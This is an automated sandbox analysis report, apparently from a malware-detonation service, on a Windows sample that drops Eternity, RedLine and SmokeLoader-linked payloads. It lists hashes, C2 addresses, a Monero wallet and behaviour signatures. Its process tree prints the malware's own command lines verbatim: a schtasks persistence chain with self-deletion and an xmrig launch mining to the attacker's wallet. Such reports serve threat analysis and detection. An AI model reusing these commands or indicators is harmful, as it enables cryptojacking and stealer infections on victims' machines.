Analysis

  • max time kernel
    152s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/09/2022, 08:20

General

  • Target

    ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe

  • Size

    290KB

  • MD5

    2d1f283056afba3e59b97ba5d2e3c36c

  • SHA1

    18fbb5c92a65a542efc33c4e000befc7f4b72116

  • SHA256

    ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923

  • SHA512

    95413dbadc9fbaf53c54c8583fbd6d1e1bd4102ba3f4288603e055711859c8ac61ca9519fe2c16005ecfa7d985c8342ba37931f1cd8a8f2313ddec91f76b129b

  • SSDEEP

    3072:m71zXZ1wMA4fCbMROmbiF7SN4Q+LcjGraJSjonbl5O:BMKbMROmbitmmcjxHD

Malware Config

Extracted

Family

eternity

C2

http://rlcjba7wduej3xcstcjo577eqgjsjvcjfsw4i23fqvf2y27ylylhmhad.onion

Wallets

45coZygmFLnRF5NY7Uz51tadci9wak52fbbhfgKR5q5BTB9QbKMiCnXiPiiwCwyUTQeF4nZD5mdAugj8yB5hTLA9ViAFFR8

Attributes
  • payload_urls

    http://rlcjba7wduej3xcstcjo577eqgjsjvcjfsw4i23fqvf2y27ylylhmhad.onion.pet/shared/xmrig.exe

Extracted

Family

redline

Botnet

installs-49

C2

94.140.112.157:29329

Attributes
  • auth_value

    f137ab12b29192785aff1f9a524f0090

Signatures

  • Detects Smokeloader packer 2 IoCs
  • Eternity

    Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe
    "C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe"
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    PID:4988
  • C:\Users\Admin\AppData\Local\Temp\1FA8.exe
    C:\Users\Admin\AppData\Local\Temp\1FA8.exe
    1⤵
    • Executes dropped EXE
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1748
    • C:\Users\Admin\AppData\Local\Temp\Miner.exe
      "C:\Users\Admin\AppData\Local\Temp\Miner.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3668
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Miner" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Miner.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1144
        • C:\Windows\SysWOW64\chcp.com
          chcp 65001
          4⤵
            PID:980
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1
            4⤵
            • Runs ping.exe
            PID:1616
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn "Miner" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe" /rl HIGHEST /f
            4⤵
            • Creates scheduled task(s)
            PID:428
          • C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe
            "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe"
            4⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4496
            • C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe
              "C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe" -a cryptonight -o pool.supportxmr.com:3333 -u 45coZygmFLnRF5NY7Uz51tadci9wak52fbbhfgKR5q5BTB9QbKMiCnXiPiiwCwyUTQeF4nZD5mdAugj8yB5hTLA9ViAFFR8.Admin_XZIOFAVD -p --max-cpu-usage=40 --donate-level=1
              5⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:3848
      • C:\Users\Admin\AppData\Local\Temp\installs49.exe
        "C:\Users\Admin\AppData\Local\Temp\installs49.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1780
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 1424
        2⤵
        • Program crash
        PID:5060
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1748 -ip 1748
      1⤵
        PID:1712
      • C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe
        C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe
        1⤵
        • Executes dropped EXE
        PID:4904

      Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Miner.exe.log

              Filesize

              612B

              MD5

              81ab0e59097e03cb04c32378024d6628

              SHA1

              cc2a7a335f905e787906b6a0820acfbd4c5d0ed2

              SHA256

              704dd8b8fb6dfccf43fd0712e36950102151fe7232d6602c53a42af967969533

              SHA512

              3dd1374962c4d913ad6ec4207889abcca3e28946fa8937626bd2d13025a538e676bfc2efe76d27031d3f741bb3934104c0cf4e10da62758839add1fe543dfacb

            • C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

              Filesize

              16KB

              MD5

              d1b22ce6e0f11c1b8283a85d9f902bbd

              SHA1

              8593038e651f856367d094b4541dd7cbffb8e7a3

              SHA256

              95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8

              SHA512

              d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed

            • C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

              Filesize

              16KB

              MD5

              d1b22ce6e0f11c1b8283a85d9f902bbd

              SHA1

              8593038e651f856367d094b4541dd7cbffb8e7a3

              SHA256

              95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8

              SHA512

              d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed

            • C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

              Filesize

              16KB

              MD5

              d1b22ce6e0f11c1b8283a85d9f902bbd

              SHA1

              8593038e651f856367d094b4541dd7cbffb8e7a3

              SHA256

              95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8

              SHA512

              d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed

            • C:\Users\Admin\AppData\Local\Temp\1FA8.exe

              Filesize

              436KB

              MD5

              f1ae38e744808d4df42eed53c896323a

              SHA1

              0d0edac38a4e1a1c073aa99fc1009230a05deb74

              SHA256

              9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439

              SHA512

              b23262fd0709c2cdf2702bab85a39ffeeebc28644e268ddecf5861bef6307b3f92c50a73b5725fa1a8578033c446bd957277224a24ed7ccd806bf3d0a77376d6

            • C:\Users\Admin\AppData\Local\Temp\1FA8.exe

              Filesize

              436KB

              MD5

              f1ae38e744808d4df42eed53c896323a

              SHA1

              0d0edac38a4e1a1c073aa99fc1009230a05deb74

              SHA256

              9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439

              SHA512

              b23262fd0709c2cdf2702bab85a39ffeeebc28644e268ddecf5861bef6307b3f92c50a73b5725fa1a8578033c446bd957277224a24ed7ccd806bf3d0a77376d6

            • C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe

              Filesize

              4.7MB

              MD5

              84cbc72865b542c646bd89bb9430e7d1

              SHA1

              c8320b1e24f22b36c1a283506dacdcbcf5598a4f

              SHA256

              323a18d661fab8c743bb0584b4182902f49640a9ead4b9cedfb548889c25a9d4

              SHA512

              235afdba7fcf029920a20ac3d99ce0dacd87554d27a0e473ff5636c74f7f747ed9d242637d10963bac7461f789266191b37beaec0b9acdd2dc38b0f196ae65a8

            • C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe

              Filesize

              4.7MB

              MD5

              84cbc72865b542c646bd89bb9430e7d1

              SHA1

              c8320b1e24f22b36c1a283506dacdcbcf5598a4f

              SHA256

              323a18d661fab8c743bb0584b4182902f49640a9ead4b9cedfb548889c25a9d4

              SHA512

              235afdba7fcf029920a20ac3d99ce0dacd87554d27a0e473ff5636c74f7f747ed9d242637d10963bac7461f789266191b37beaec0b9acdd2dc38b0f196ae65a8

            • C:\Users\Admin\AppData\Local\Temp\Miner.exe

              Filesize

              16KB

              MD5

              d1b22ce6e0f11c1b8283a85d9f902bbd

              SHA1

              8593038e651f856367d094b4541dd7cbffb8e7a3

              SHA256

              95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8

              SHA512

              d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed

            • C:\Users\Admin\AppData\Local\Temp\Miner.exe

              Filesize

              16KB

              MD5

              d1b22ce6e0f11c1b8283a85d9f902bbd

              SHA1

              8593038e651f856367d094b4541dd7cbffb8e7a3

              SHA256

              95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8

              SHA512

              d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed

            • C:\Users\Admin\AppData\Local\Temp\installs49.exe

              Filesize

              88KB

              MD5

              24f5400ea175ed8a981c5f4184587ac4

              SHA1

              24b9e12675b4e5f389eb01d6c423e123909d02d9

              SHA256

              3be6f25cd0a2f0c367e34e6b2d300671626dcb7ce46aeb83f3396433d8da9bc4

              SHA512

              4d685f9f062359b6aae187cb88c98d55c059a316bccf6fc07aed3cbb172ee55edf84aa2fd53f67d9a5301195dddf7dc68e7e10ea2ffdf7d8a13750440f0a9669

            • C:\Users\Admin\AppData\Local\Temp\installs49.exe

              Filesize

              88KB

              MD5

              24f5400ea175ed8a981c5f4184587ac4

              SHA1

              24b9e12675b4e5f389eb01d6c423e123909d02d9

              SHA256

              3be6f25cd0a2f0c367e34e6b2d300671626dcb7ce46aeb83f3396433d8da9bc4

              SHA512

              4d685f9f062359b6aae187cb88c98d55c059a316bccf6fc07aed3cbb172ee55edf84aa2fd53f67d9a5301195dddf7dc68e7e10ea2ffdf7d8a13750440f0a9669

            • memory/1748-141-0x0000000007320000-0x00000000078C4000-memory.dmp

              Filesize

              5.6MB

            • memory/1748-144-0x0000000000400000-0x0000000002BB6000-memory.dmp

              Filesize

              39.7MB

            • memory/1748-162-0x0000000000400000-0x0000000002BB6000-memory.dmp

              Filesize

              39.7MB

            • memory/1748-142-0x0000000002E4C000-0x0000000002E81000-memory.dmp

              Filesize

              212KB

            • memory/1748-161-0x0000000002E4C000-0x0000000002E81000-memory.dmp

              Filesize

              212KB

            • memory/1748-143-0x00000000047D0000-0x0000000004812000-memory.dmp

              Filesize

              264KB

            • memory/1780-158-0x00000000050D0000-0x00000000050E2000-memory.dmp

              Filesize

              72KB

            • memory/1780-170-0x0000000006100000-0x000000000611E000-memory.dmp

              Filesize

              120KB

            • memory/1780-157-0x00000000061A0000-0x00000000067B8000-memory.dmp

              Filesize

              6.1MB

            • memory/1780-173-0x0000000006BE0000-0x0000000006C30000-memory.dmp

              Filesize

              320KB

            • memory/1780-159-0x0000000005200000-0x000000000530A000-memory.dmp

              Filesize

              1.0MB

            • memory/1780-160-0x0000000005130000-0x000000000516C000-memory.dmp

              Filesize

              240KB

            • memory/1780-172-0x0000000007110000-0x000000000763C000-memory.dmp

              Filesize

              5.2MB

            • memory/1780-163-0x0000000005B80000-0x0000000005C12000-memory.dmp

              Filesize

              584KB

            • memory/1780-171-0x0000000006A10000-0x0000000006BD2000-memory.dmp

              Filesize

              1.8MB

            • memory/1780-156-0x0000000000830000-0x000000000084C000-memory.dmp

              Filesize

              112KB

            • memory/1780-169-0x0000000006120000-0x0000000006196000-memory.dmp

              Filesize

              472KB

            • memory/3668-148-0x0000000000230000-0x000000000023A000-memory.dmp

              Filesize

              40KB

            • memory/3668-149-0x0000000004A60000-0x0000000004AC6000-memory.dmp

              Filesize

              408KB

            • memory/3848-179-0x0000027035200000-0x0000027035220000-memory.dmp

              Filesize

              128KB

            • memory/3848-181-0x0000027035200000-0x0000027035220000-memory.dmp

              Filesize

              128KB

            • memory/3848-182-0x0000027035220000-0x0000027035240000-memory.dmp

              Filesize

              128KB

            • memory/3848-180-0x0000027035220000-0x0000027035240000-memory.dmp

              Filesize

              128KB

            • memory/3848-178-0x0000027033910000-0x0000027033930000-memory.dmp

              Filesize

              128KB

            • memory/3848-177-0x00000270338D0000-0x00000270338F0000-memory.dmp

              Filesize

              128KB

            • memory/4988-134-0x0000000000400000-0x0000000002B92000-memory.dmp

              Filesize

              39.6MB

            • memory/4988-137-0x0000000000400000-0x0000000002B92000-memory.dmp

              Filesize

              39.6MB

            • memory/4988-135-0x0000000002F1D000-0x0000000002F2D000-memory.dmp

              Filesize

              64KB

            • memory/4988-133-0x0000000002E30000-0x0000000002E39000-memory.dmp

              Filesize

              36KB

            • memory/4988-136-0x0000000002E30000-0x0000000002E39000-memory.dmp

              Filesize

              36KB

            • memory/4988-132-0x0000000002F1D000-0x0000000002F2D000-memory.dmp

              Filesize

              64KB